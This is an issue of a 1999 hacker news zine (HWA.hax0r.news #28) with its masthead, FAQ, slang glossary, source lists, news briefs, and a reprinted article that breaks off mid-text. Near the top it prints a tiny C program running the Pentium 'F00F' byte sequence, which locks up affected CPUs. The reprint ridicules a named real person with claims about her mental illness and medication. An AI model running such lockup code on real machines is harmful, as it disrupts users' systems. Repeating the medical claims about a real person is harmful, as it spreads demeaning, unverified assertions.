[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ] =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= ========================================================================== = <=-[ HWA.hax0r.news ]-=> = ========================================================================== [=HWA'99=] Number 28 Volume 1 1999 Aug 7th 99 ========================================================================== [ 61:20:6B:69:64:20:63:6F:75: ] [ 6C:64:20:62:72:65:61:6B:20:74:68:69:73: ] [ 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:! ] ========================================================================== Like all religions, the Holy Religion of the Invisible Pink Unicorn is based upon both Logic and Faith. We have Faith that She is Pink; and we Logically know that She is Invisible, because we can't see Her. - http://www.ozemail.com.au/~ksolway/athquot.html */ char x [5] = { 0xf0, 0x0f, 0xc7, 0xc8 }; main () { void (*f)() = x; f(); } New mirror site :http://www.ducktank.net/hwa/issues.html. HWA.hax0r.news is sponsored by Cubesoft communications www.csoft.net and www.digitalgeeks.com thanks to p0lix for the digitalgeeks bandwidth and airportman for the Cubesoft bandwidth. Also shouts out to all our mirror sites! tnx guys. http://www.csoft.net/~hwa http://www.digitalgeeks.com/hwa HWA.hax0r.news Mirror Sites: ~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.ducktank.net/hwa/issues.html. ** NEW ** http://www.alldas.de/hwaidx1.htm ** NEW ** CHECK THIS ONE OUT ** http://www.csoft.net/~hwa/ http://www.digitalgeeks.com/hwa. http://members.tripod.com/~hwa_2k http://welcome.to/HWA.hax0r.news/ http://www.attrition.org/~modify/texts/zines/HWA/ http://archives.projectgamma.com/zines/hwa/. http://www.403-security.org/Htmls/hwa.hax0r.news.htm For many, faith is a suitable substitute for knowledge, as death is for a difficult life. SYNOPSIS (READ THIS) -------------------- The purpose of this newsletter is to 'digest' current events of interest that affect the online underground and netizens in general. This includes coverage of general security issues, hacks, exploits, underground news and anything else I think is worthy of a look see. (remember i'm doing this for me, not you, the fact some people happen to get a kick/use out of it is of secondary importance). This list is NOT meant as a replacement for, nor to compete with, the likes of publications such as CuD or PHRACK or with news sites such as AntiOnline, the Hacker News Network (HNN) or mailing lists such as BUGTRAQ or ISN nor could any other 'digest' of this type do so. It *is* intended however, to compliment such material and provide a reference to those who follow the culture by keeping tabs on as many sources as possible and providing links to further info, its a labour of love and will be continued for as long as I feel like it, i'm not motivated by dollars or the illusion of fame, did you ever notice how the most famous/infamous hackers are the ones that get caught? there's a lot to be said for remaining just outside the circle... @HWA =-----------------------------------------------------------------------= Welcome to HWA.hax0r.news ... #28 =-----------------------------------------------------------------------= We could use some more people joining the channel, its usually pretty quiet, we don't bite (usually) so if you're hanging out on irc stop by and idle a while and say hi... ******************************************************************* *** /join #HWA.hax0r.news on EFnet the key is `zwen' *** *** *** *** please join to discuss or impart news on techno/phac scene *** *** stuff or just to hang out ... someone is usually around 24/7*** *** *** *** Note that the channel isn't there to entertain you its for *** *** you to talk to us and impart news, if you're looking for fun*** *** then do NOT join our channel try #weirdwigs or something... *** *** we're not #chatzone or #hack *** *** *** ******************************************************************* =-------------------------------------------------------------------------= Issue #28 =--------------------------------------------------------------------------= [ INDEX ] =--------------------------------------------------------------------------= Key Intros =--------------------------------------------------------------------------= 00.0 .. COPYRIGHTS ...................................................... 00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC ....................... 00.2 .. SOURCES ......................................................... 00.3 .. THIS IS WHO WE ARE .............................................. 00.4 .. WHAT'S IN A NAME? why `HWA.hax0r.news'?.......................... 00.5 .. THE HWA_FAQ V1.0 ................................................ =--------------------------------------------------------------------------= Key Content =--------------------------------------------------------------------------= 01.0 .. GREETS .......................................................... 01.1 .. Last minute stuff, rumours, newsbytes ........................... 01.2 .. Mailbag ......................................................... 02.0 .. From the Editor.................................................. 03.0 .. Debunking the debunked by route.................................. 04.0 .. DefCon 7 by AgentX............................................... 05.0 .. Hacking Faq by ben-z 5/14/99..................................... 06.0 .. Group approves controversial software law ....................... 07.0 .. Falun Gong Web Sites Attacked by China? ......................... 08.0 .. Super Computer Almost Gets Away ................................. 09.0 .. Symantec's website hacked........................................ 10.0 .. New virus due to hit town "New virus spills your beans " - BBC... 11.0 .. New York Times Debunked - FIDNet Moves Ahead as Planned ......... 12.0 .. Computer `crackers' set sights on .gov for chaos................. 13.0 .. IIS Server 'hackproof'? ......................................... 14.0 .. Latest CWD Pokes at AntiOnline .................................. 15.0 .. High Profile Sites Defaced ...................................... 16.0 .. Off The Hook Goes Shortwave ..................................... 17.0 .. Feds Stop Satellite Biz due to WireTaps ......................... 18.0 .. InfoCriminals Should Face Reasonable Penalties .................. 19.0 .. L0pht Professional Plugin Pack For BO2K ......................... 20.0 .. MS Wants Free Publicity?......................................... 20.1 .. MS: a crashed site is hard to hack!.............................. 21.0 .. China Seeks to Develop Infowar Capabilities ..................... 22.0 .. Online Banking Still Risky Congress Says ........................ 23.0 .. NIPRNet Access Restricted ....................................... 24.0 .. Gov Employees Personal Privacy at Risk .......................... 25.0 .. Other Security Challenges Offered ............................... 25.1 .. Software developer offers hacker challenge....................... 26.0 .. CCC Camp About to Get Under Way ................................. 27.0 .. Hackers... Those Who Would Be Gods .............................. 28.0 .. European Crypto Mailing List .................................... 29.0 .. "Ya Wanna Be Hackers, Code Crackers, or just AOL Chat Room Yackers?" 30.0 .. WHO DO YOU WANT TO BE TODAY?..................................... 31.0 .. NAI GROUPSHIELD FOR EXCHANGE BUG................................. 32.0 .. How the blackhats work........................................... 33.0 .. ADMINS ASLEEP ON WATCH?.......................................... 34.0 .. THEFT HURTS THE WELL............................................. 35.0 .. MICROSOFT SECURITY FLAWS......................................... 36.0 .. CHINESE CYBER WARRIORS........................................... 37.0 .. MICROSOFT AND SECURITY (AGAIN)................................... 38.0 .. THE ENEMY WITHIN................................................. 39.0 .. DRUNKEN HACKERS ON JERRY SPRINGER................................ 40.0 .. DATA PROTECTION NOT TO BE IGNORED................................ 41.0 .. WIRELESS ENCRYPTION HANDHELDS.................................... 42.0 .. Y2K TO AID IN CYBERDEFENSE....................................... 43.0 .. BUGTRAQ:Yet Another ODBC Bugged ASP Sample Page.................. 44.0 .. New mailing lists offered by www.securityfocus.com............... 45.0 .. Beyond Virtual Vaccinations...................................... 46.0 .. Forgot your password? Try 'way2many' ......................... 47.0 .. A Former Network Administrator Faces Felony Charges in Hacker-Site Case 48.0 .. Kevin's life now, and happy birthday Kevin....................... 49.0 .. Cybercrime up 43%................................................ 50.0 .. Canada Can't Keep Up With CyberCrime ............................ 51.0 .. Germans hold bank liable for using 56 bit encryption............. 52.0 .. GPS Date Rollover on Aug 22 ..................................... 53.0 .. NY Police Face Possible Copyright Violations .................... 54.0 .. Chaos Computer Club: Happy Hacker Campers........................ 55.0 .. Hackers and Cyberwar "The Threat of Chaos " ................. 56.0 .. Lockdown 2000.................................................... 57.0 .. The SMURF attack and smurf amplifiers............................ =--------------------------------------------------------------------------= AD.S .. Post your site ads or etc here, if you can offer something in return thats tres cool, if not we'll consider ur ad anyways so send it in. ads for other zines are ok too btw just mention us in yours, please remember to include links and an email contact. Corporate ads will be considered also and if your company wishes to donate to or participate in the upcoming Canc0n99 event send in your suggestions and ads now...n.b date and time may be pushed back join mailing list for up to date information....................................... Current dates: Aug19th-22nd Niagara Falls... ................. Ha.Ha .. Humour and puzzles ............................................ Hey You!........................................................ =------=........................................................ Send in humour for this section! I need a laugh and its hard to find good stuff... ;)........................................... SITE.1 .. Featured site, ................................................. H.W .. Hacked Websites ............................................... A.0 .. APPENDICES...................................................... A.1 .. PHACVW linx and references...................................... =--------------------------------------------------------------------------= @HWA'99 00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE OPINIONS OF THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO WTF IS GONNA TAKE RESPONSIBILITY FOR THIS, I'M NOT DOING IT (LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND) SO UHM JUST READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ). Important semi-legalese and license to redistribute: YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF AND ARE GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE ZINE SO LONG AS Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED IN YOUR WRITING. LINK'S ARE NOT NECESSARY OR EXPECTED BUT ARE APPRECIATED the current link is http://welcome.to/HWA.hax0r.news IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK ANY NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL ME PRIVATELY current email cruciphux@dok.org THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL WORKS ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL THE LAYOUT AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS: I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE AND REDISTRIBUTE/MIRROR. - EoD Although this file and all future issues are now copyright, some of the content holds its own copyright and these are printed and respected. News is news so i'll print any and all news but will quote sources when the source is known, if its good enough for CNN its good enough for me. And i'm doing it for free on my own time so pfffft. :) No monies are made or sought through the distribution of this material. If you have a problem or concern email me and we'll discuss it. cruciphux@dok.org Cruciphux [C*:.] 00.1 CONTACT INFORMATION AND MAIL DROP ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Wahoo, we now have a mail-drop, if you are outside of the U.S.A or Canada / North America (hell even if you are inside ..) and wish to send printed matter like newspaper clippings a subscription to your cool foreign hacking zine or photos, small non-explosive packages or sensitive information etc etc well, now you can. (w00t) please no more inflatable sheep or plastic dog droppings, or fake vomit thanks. Send all goodies to: HWA NEWS P.O BOX 44118 370 MAIN ST. NORTH BRAMPTON, ONTARIO CANADA L6V 4H5 WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you are ~~~~~~~ reading this from some interesting places, make my day and get a mention in the zine, send in a postcard, I realize that some places it is cost prohibitive but if you have the time and money be a cool dude / gal and send a poor guy a postcard preferably one that has some scenery from your place of residence for my collection, I collect stamps too so you kill two birds with one stone by being cool and mailing in a postcard, return address not necessary, just a "hey guys being cool in Bahrain, take it easy" will do ... ;-) thanx. Ideas for interesting 'stuff' to send in apart from news: - Photo copies of old system manual front pages (optionally signed by you) ;-) - Photos of yourself, your mom, sister, dog and or cat in a NON compromising position plz I don't want pr0n. - Picture postcards - CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250 tapes with hack/security related archives, logs, irc logs etc on em. - audio or video cassettes of yourself/others etc of interesting phone fun or social engineering examples or transcripts thereof. Stuff you can email: - Prank phone calls in .ram or .mp* format - Fone tones and security announcements from PBX's etc - fun shit you sampled off yer scanner (relevant stuff only like #2600 meeting activities) - reserved for one smiley face -> :-) <- - PHACV lists of files that you have or phac cd's you own (we have a burner, *g*) - burns of phac cds (email first to make sure we don't already have em) - Any and all telephone sounds/tones/beeps/trunk drops/line tests/etc in .ram etc format or .mp* If you still can't think of anything you're probably not that interesting a person after all so don't worry about it Our current email: Submissions/zine gossip.....: hwa@press.usmc.net Private email to editor.....: cruciphux@dok.org Distribution/Website........: sas72@usa.net @HWA 00.2 Sources *** ~~~~~~~~~~~ Sources can be some, all, or none of the following (by no means complete nor listed in any degree of importance) Unless otherwise noted, like msgs from lists or news from other sites, articles and information is compiled and or sourced by Cruciphux no copyright claimed. News & I/O zine ................. http://www.antionline.com/ Back Orifice/cDc..................http://www.cultdeadcow.com/ News site (HNN) .....,............http://www.hackernews.com/ Help Net Security.................http://net-security.org/ News,Advisories,++ .(lophtcrack)..http://www.l0pht.com/ NewsTrolls .(daily news ).........http://www.newstrolls.com/ News + Exploit archive ...........http://www.rootshell.com/beta/news.html CuD Computer Underground Digest...http://www.soci.niu.edu/~cudigest News site+........................http://www.zdnet.com/ News site+Security................http://www.gammaforce.org/ News site+Security................http://www.projectgamma.com/ News site+Security................http://securityhole.8m.com/ News site+Security related site...http://www.403-security.org/ *DOWN* News/Humour site+ ................http://www.innerpulse.com News/Techie news site.............http://www.slashdot.org +Various mailing lists and some newsgroups, such as ... +other sites available on the HNN affiliates page, please see http://www.hackernews.com/affiliates.html as they seem to be popping up rather frequently ... http://www.the-project.org/ .. IRC list/admin archives http://www.anchordesk.com/ .. Jesse Berst's AnchorDesk alt.hackers.malicious alt.hackers alt.2600 BUGTRAQ ISN security mailing list ntbugtraq <+others> NEWS Agencies, News search engines etc: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.cnn.com/SEARCH/ http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0 http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack http://www.ottawacitizen.com/business/ http://search.yahoo.com.sg/search/news_sg?p=hack http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack http://www.zdnet.com/zdtv/cybercrime/ http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column) NOTE: See appendices for details on other links. http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm http://freespeech.org/eua/ Electronic Underground Affiliation http://ech0.cjb.net ech0 Security http://axon.jccc.net/hir/ Hackers Information Report http://net-security.org Net Security http://www.403-security.org Daily news and security related site Submissions/Hints/Tips/Etc ~~~~~~~~~~~~~~~~~~~~~~~~~~ All submissions that are `published' are printed with the credits you provide, if no response is received by a week or two it is assumed that you don't care wether the article/email is to be used in an issue or not and may be used at my discretion. Looking for: Good news sites that are not already listed here OR on the HNN affiliates page at http://www.hackernews.com/affiliates.html Magazines (complete or just the articles) of breaking sekurity or hacker activity in your region, this includes telephone phraud and any other technological use, abuse hole or cool thingy. ;-) cut em out and send it to the drop box. - Ed Mailing List Subscription Info (Far from complete) Feb 1999 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~ ~~~~~~~~ ISS Security mailing list faq : http://www.iss.net/iss/maillist.html THE MOST READ: BUGTRAQ - Subscription info ~~~~~~~~~~~~~~~~~~~~~~~~~~~ What is Bugtraq? Bugtraq is a full-disclosure UNIX security mailing list, (see the info file) started by Scott Chasin . To subscribe to bugtraq, send mail to listserv@netspace.org containing the message body subscribe bugtraq. I've been archiving this list on the web since late 1993. It is searchable with glimpse and archived on-the-fly with hypermail. Searchable Hypermail Index; http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html Link About the Bugtraq mailing list ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The following comes from Bugtraq's info file: This list is for *detailed* discussion of UNIX security holes: what they are, how to exploit, and what to do to fix them. This list is not intended to be about cracking systems or exploiting their vulnerabilities. It is about defining, recognizing, and preventing use of security holes and risks. Please refrain from posting one-line messages or messages that do not contain any substance that can relate to this list`s charter. I will allow certain informational posts regarding updates to security tools, documents, etc. But I will not tolerate any unnecessary or nonessential "noise" on this list. Please follow the below guidelines on what kind of information should be posted to the Bugtraq list: + Information on Unix related security holes/backdoors (past and present) + Exploit programs, scripts or detailed processes about the above + Patches, workarounds, fixes + Announcements, advisories or warnings + Ideas, future plans or current works dealing with Unix security + Information material regarding vendor contacts and procedures + Individual experiences in dealing with above vendors or security organizations + Incident advisories or informational reporting Any non-essential replies should not be directed to the list but to the originator of the message. Please do not "CC" the bugtraq reflector address if the response does not meet the above criteria. Remember: YOYOW. You own your own words. This means that you are responsible for the words that you post on this list and that reproduction of those words without your permission in any medium outside the distribution of this list may be challenged by you, the author. For questions or comments, please mail me: chasin@crimelab.com (Scott Chasin) Crypto-Gram ~~~~~~~~~~~ CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses, insights, and commentaries on cryptography and computer security. To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a blank message to crypto-gram-subscribe@chaparraltree.com.  To unsubscribe, visit http://www.counterpane.com/unsubform.html.  Back issues are available on http://www.counterpane.com. CRYPTO-GRAM is written by Bruce Schneier.  Schneier is president of Counterpane Systems, the author of "Applied Cryptography," and an inventor of the Blowfish, Twofish, and Yarrow algorithms.  He served on the board of the International Association for Cryptologic Research, EPIC, and VTW.  He is a frequent writer and lecturer on cryptography. CUD Computer Underground Digest ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This info directly from their latest ish: Computer underground Digest    Sun  14 Feb, 1999   Volume 11 : Issue 09                             ISSN  1004-042X        Editor: Jim Thomas (cudigest@sun.soci.niu.edu)        News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)        Archivist: Brendan Kehoe        Poof Reader:   Etaion Shrdlu, Jr.        Shadow-Archivists: Dan Carosone / Paul Southworth                           Ralph Sims / Jyrki Kuoppala                           Ian Dickinson        Cu Digest Homepage: http://www.soci.niu.edu/~cudigest [ISN] Security list ~~~~~~~~~~~~~~~~~~~ This is a low volume list with lots of informative articles, if I had my way i'd reproduce them ALL here, well almost all .... ;-) - Ed Subscribe: mail majordomo@repsec.com with "subscribe isn". @HWA 00.3 THIS IS WHO WE ARE ~~~~~~~~~~~~~~~~~~ Some HWA members and Legacy staff ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ cruciphux@dok.org.........: currently active/editorial darkshadez@ThePentagon.com: currently active/man in black fprophet@dok.org..........: currently active/IRC+ man in black sas72@usa.net ............. currently active/IRC+ distribution vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black dicentra...(email withheld): IRC+ grrl in black eentity ...( '' '' ): Currently active/IRC+ man in black Foreign Correspondants/affiliate members ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Qubik ............................: United Kingdom D----Y ...........................: USA/world media HWA members ......................: World Media Past Foreign Correspondants (currently inactive or presumed dead) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ N0Portz ..........................: Australia system error .....................: Indonesia Wile (wile coyote) ...............: Japan/the East Ruffneck ........................: Netherlands/Holland Please send in your sites for inclusion here if you haven't already also if you want your emails listed send me a note ... - Ed Spikeman's site is down as of this writing, if it comes back online it will be posted here. http://www.hackerlink.or.id/ ............ System Error's site (in Indonesian) ******************************************************************* *** /join #HWA.hax0r.news on EFnet the key is `zwen' *** ******************************************************************* :-p 1. We do NOT work for the government in any shape or form.Unless you count paying taxes ... in which case we work for the gov't in a BIG WAY. :-/ 2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news events its a good idea to check out issue #1 at least and possibly also the Xmas issue for a good feel of what we're all about otherwise enjoy - Ed ... @HWA 00.4 Whats in a name? why HWA.hax0r.news?? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Well what does HWA stand for? never mind if you ever find out I may have to get those hax0rs from 'Hackers' or the Pretorians after you. In case you couldn't figure it out hax0r is "new skewl" and although it is laughed at, shunned, or even pidgeon holed with those 'dumb leet (l33t?) dewds' this is the state of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you up and comers, i'd highly recommend you get that book. Its almost like buying a clue. Anyway..on with the show .. - Editorial staff @HWA 00.5 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Also released in issue #3. (revised) check that issue for the faq it won't be reprinted unless changed in a big way with the exception of the following excerpt from the FAQ, included to assist first time readers: Some of the stuff related to personal useage and use in this zine are listed below: Some are very useful, others attempt to deny the any possible attempts at eschewing obfuscation by obsucuring their actual definitions. @HWA - see EoA ;-) != - Mathematical notation "is not equal to" or "does not equal" ASC(247) "wavey equals" sign means "almost equal" to. If written an =/= (equals sign with a slash thru it) also means !=, =< is Equal to or less than and => is equal to or greater than (etc, this aint fucking grade school, cripes, don't believe I just typed all that..) AAM - Ask a minor (someone under age of adulthood, usually <16, <18 or <21) AOL - A great deal of people that got ripped off for net access by a huge clueless isp with sekurity that you can drive buses through, we're not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the least they could try leasing one?? *CC - 1 - Credit Card (as in phraud) 2 - .cc is COCOS (Keeling) ISLANDS butthey probably accept cc's CCC - Chaos Computer Club (Germany) *CON - Conference, a place hackers crackers and hax0rs among others go to swap ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk watch videos and seminars, get drunk, listen to speakers, and last but not least, get drunk. *CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker speak he's the guy that breaks into systems and is often (but by no means always) a "script kiddie" see pheer 2 . An edible biscuit usually crappy tasting without a nice dip, I like jalapeno pepper dip or chives sour cream and onion, yum - Ed Ebonics - speaking like a rastafarian or hip dude of colour also wigger Vanilla Ice is a wigger, The Beastie Boys and rappers speak using ebonics, speaking in a dark tongue ... being ereet, see pheer EoC - End of Commentary EoA - End of Article or more commonly @HWA EoF - End of file EoD - End of diatribe (AOL'ers: look it up) FUD - Coined by Unknown and made famous by HNN - "Fear uncertainty and doubt", usually in general media articles not high brow articles such as ours or other HNN affiliates ;) du0d - a small furry animal that scurries over keyboards causing people to type weird crap on irc, hence when someone says something stupid or off topic 'du0d wtf are you talkin about' may be used. *HACKER - Read Stephen Levy's HACKERS for the true definition, then see HAX0R *HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to define, I think it is best defined as pop culture's view on The Hacker ala movies such as well erhm "Hackers" and The Net etc... usually used by "real" hackers or crackers in a derogatory or slang humorous way, like 'hax0r me some coffee?' or can you hax0r some bread on the way to the table please?' 2 - A tool for cutting sheet metal. HHN - Maybe a bit confusing with HNN but we did spring to life around the same time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper noun means the hackernews site proper. k? k. ;& HNN - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html J00 - "you"(as in j00 are OWN3D du0d) - see 0wn3d MFI/MOI- Missing on/from IRC NFC - Depends on context: No Further Comment or No Fucking Comment NFR - Network Flight Recorder (Do a websearch) see 0wn3d NFW - No fuckin'way *0WN3D - You are cracked and owned by an elite entity see pheer *OFCS - Oh for christ's sakes PHACV - And variations of same Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare Alternates: H - hacking, hacktivist C - Cracking C - Cracking V - Virus W - Warfare A - Anarchy (explosives etc, Jolly Roger's Cookbook etc) P - Phreaking, "telephone hacking" PHone fREAKs ... CT - Cyber Terrorism *PHEER - This is what you do when an ereet or elite person is in your presence see 0wn3d *RTFM - Read the fucking manual - not always applicable since some manuals are pure shit but if the answer you seek is indeed in the manual then you should have RTFM you dumb ass. TBC - To Be Continued also 2bc (usually followed by ellipses...) :^0 TBA - To Be Arranged/To Be Announced also 2ba TFS - Tough fucking shit. *w00t - 1 - Reserved for the uber ereet, noone can say this without severe repercussions from the underground masses. also "w00ten" 2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers) *wtf - what the fuck, where the fuck, when the fuck etc .. *ZEN - The state you reach when you *think* you know everything (but really don't) usually shortly after reaching the ZEN like state something will break that you just 'fixed' or tweaked. @HWA -=- :. .: -=- 01.0 Greets!?!?! yeah greets! w0w huh. - Ed ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Thanks to all in the community for their support and interest but i'd like to see more reader input, help me out here, whats good, what sucks etc, not that I guarantee i'll take any notice mind you, but send in your thoughts anyway. * all the people who sent in cool emails and support FProphet Pyra TwstdPair _NeM_ D----Y Dicentra vexxation sAs72 Spikeman p0lix Ken Williams/tattooman of PacketStorm, hang in there Ken...:( & Kevin Mitnick (Happy Birthday) kewl sites: + http://www.securityportal.com/ NEW + http://www.securityfocus.com/ NEW + http://www.hackcanada.com/ + http://www.l0pht.com/ + http://www.2600.com/ + http://www.freekevin.com/ + http://www.genocide2600.com/ + http://www.packetstorm.harvard.edu/ ******* DOWN (THANKS JP) ****** + http://www.hackernews.com/ (Went online same time we started issue 1!) + http://www.net-security.org/ + http://www.slashdot.org/ + http://www.freshmeat.net/ + http://www.403-security.org/ + http://ech0.cjb.net/ @HWA 01.1 Last minute stuff, rumours and newsbytes ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "What is popular isn't always right, and what is right isn't always popular..." - FProphet '99 +++ When was the last time you backed up your important data? ++ SOPHOS WITH OXFAM From www.net-security.org/ by BHZ, Thursday 5th August 1999 on 1:58 pm CET Oxfam (www.oxfam.org), Britain's largest overseas aid charity, which employs over 250000 people, evaluated all anti-virus products on the market and chose Sophos (www.sophos.com) for securing their WANs, servers, workstations and laptops of viruses. ++ MICROSOFT STILL WORKING From www.net-security.org/ by BHZ, Thursday 5th August 1999 on 1:49 pm CET Microsoft is still trying to patch a bug in Office97, that we reported about earlier. Microsoft's group product manager for Office said: "Right now we are thoroughly testing the solution, We take all security issues seriously. To date, we have not heard from any customers on the issue". ++ Y2K IN SCHOOL SYSTEMS From www.net-security.org/ by BHZ, Thursday 5th August 1999 on 1:25 pm CET New draft about Y2K problem in schools and universities, says some very disturbing news - less that one third of all school institutions reported that they are Y2K compliant. Draft concludes that: "a troubling number of institutions, especially in the elementary/secondary area, have not yet completed their assessment of systems and are lagging in remediation and testing." ++ JAPAN WILL HALT TRAINS From www.net-security.org/ by BHZ, Thursday 5th August 1999 on 1:53 pm CET Spokesman from East Japan Railway Co., Japan's largest rail company said that they will halt all trains on the last day of this millennium. It will last just for couple of minutes - last minutes of 1999 and several minutes in the year 2000. This will all be done as a precaution against possible Y2K errors. ++ OUTDOOR GEEKS MAY VANISH SOON (TECH. 3:00 am) http://www.wired.com/news/news/email/explode-infobeat/technology/story/21098.html Weekend warriors take to the oceans, forests, rivers, and skies this month, and they'll get back home with the help of GPS. Unless the gear crashes. By James Glave. ++ DROP OUT AND CASH IN (BUS. 9:00 am) http://www.wired.com/news/news/email/explode-infobeat/business/story/21116.html Score one more for the geeks who drop out of school. A 21-year-old from Dallas sells his hardware review Web site to EarthWeb for millions. By Chris Gaither. ++ Y2K CZAR: FEDS IN GOOD SHAPE (BUS. 9:00 am) http://www.wired.com/news/news/email/explode-infobeat/business/story/21114.html In his quarterly report, John Koskinen says things look good at a national level, but some local systems are iffy. Also: Warner Bros. pushes Iron Giant on the Web.... AOL, BigE in Latin American deal.... Everyone wants a robodog.... And more. ++ A NUTS-AND-BOLTS HOUSEKEEPER (TECH. 3:00 am) http://www.wired.com/news/news/email/explode-infobeat/technology/story/21060.html To hell with your Hoover. A new domestic robot will vacuum your floor and carry the dishes for you. But your new housemate is a long way from having a personality. By Lindsey Arent. ++ COURT HAS A NASTY WORD FOR MS (POL. Wednesday) http://www.wired.com/news/news/email/explode-infobeat/politics/story/21096.html As if Microsoft weren't having enough trouble with the courts these days, jurists are upset because Word 97 is doing a lousy job word-counting legal briefs. By Declan McCullagh. ++ A PALM IN THE TOOL BELT (TECH. Wednesday) http://www.wired.com/news/news/email/explode-infobeat/technology/story/21094.html Construction workers are using PalmPilots onsite to download blueprints and help plan for the weather. Staying connected is yielding concrete results. By Lindsey Arent. ++ MICROWORKZ SIGNS ON AT&T (TECH. Wednesday) http://www.wired.com/news/news/email/explode-infobeat/technology/story/21091.html Dumped by Earthlink just days ago, the PC provider smoothes its feathers and turns to AT&T to provide iToaster customers with free Net access. ++ RIAA, DIAMOND SWEEP AWAY SUIT (POL. Wednesday) http://www.wired.com/news/news/email/explode-infobeat/politics/story/21089.html The recording industry makes peace with the MP3 maker, but questions over a new standard raises a new question: Will it last? By Chris Oakes. Thanks to myself for providing the info from my wired news feed and others from whatever sources, also to Spikeman for sending in past entries.... - Ed @HWA 01.2 MAILBAG - email and posts from the message board worthy of a read ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 02.0 From the editor. ~~~~~~~~~~~~~~~~ #include #include #include main() { printf ("Read commented source!\n\n"); /*A mixed bag of nuts in this issue, read on and enjoy..hope you *find something interesting or useful... * issue #28 * * hwa@press.usmc.net * */ printf ("EoF.\n"); } Congrats, thanks, articles, news submissions and kudos to us at the main address: hwa@press.usmc.net complaints and all nastygrams and mai*lbombs can go to /dev/nul nukes, synfloods and papasmurfs to 127.0.0.1, private mail to cruciphux@dok.org danke. C*:. 03.0 Debunking the debunked by route ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From www.antionline.com Debunking The Debunked Wednesday, July 28, 1999 at 23:57:30 by Mike D. Schiffman - Reprinted With Permission In a 16-foot wide 9-year old trailer park home in New Mexico, a 52-year old delusional woman sits in front of a computer toiling away on a non-technical "hacking" document fraught with errors. You might remember Carolyn P Meinel as 'The Happy Hacker' from such E-Files as "A Weekend Without My Zoloft" and the underground classic "Has Anyone Seen My Dignity?" Although some people would like to classify Carolyn as 'merely' delusional or talent-less, our research has added 'washed-up crackpot' and 'media charlatan.' Often we wonder how Carolyn has achieved so little over so much time, and with this brief interlude, we peel back the layers of the onion with an exclusive report from DefCon7. As it happened during the weekend of July 9th in Las Vegas, NV at the seventh installment of the DefCon Security Convention, it appears that Carolyn forgot her medicine. And these aren't simple antibiotics or histamine blockers (although she could probably use those too). No dear friends, these are powerful psycho-reactive mind-altering chemicals such as sertaline hydrochloride and diazepam. This woman has serious mental problems that require medication and treatment. We caught up with Carolyn in the hotel bar at the Alexis Park, this interviewer was participating in some lighthearted revelry with friends and cohorts, 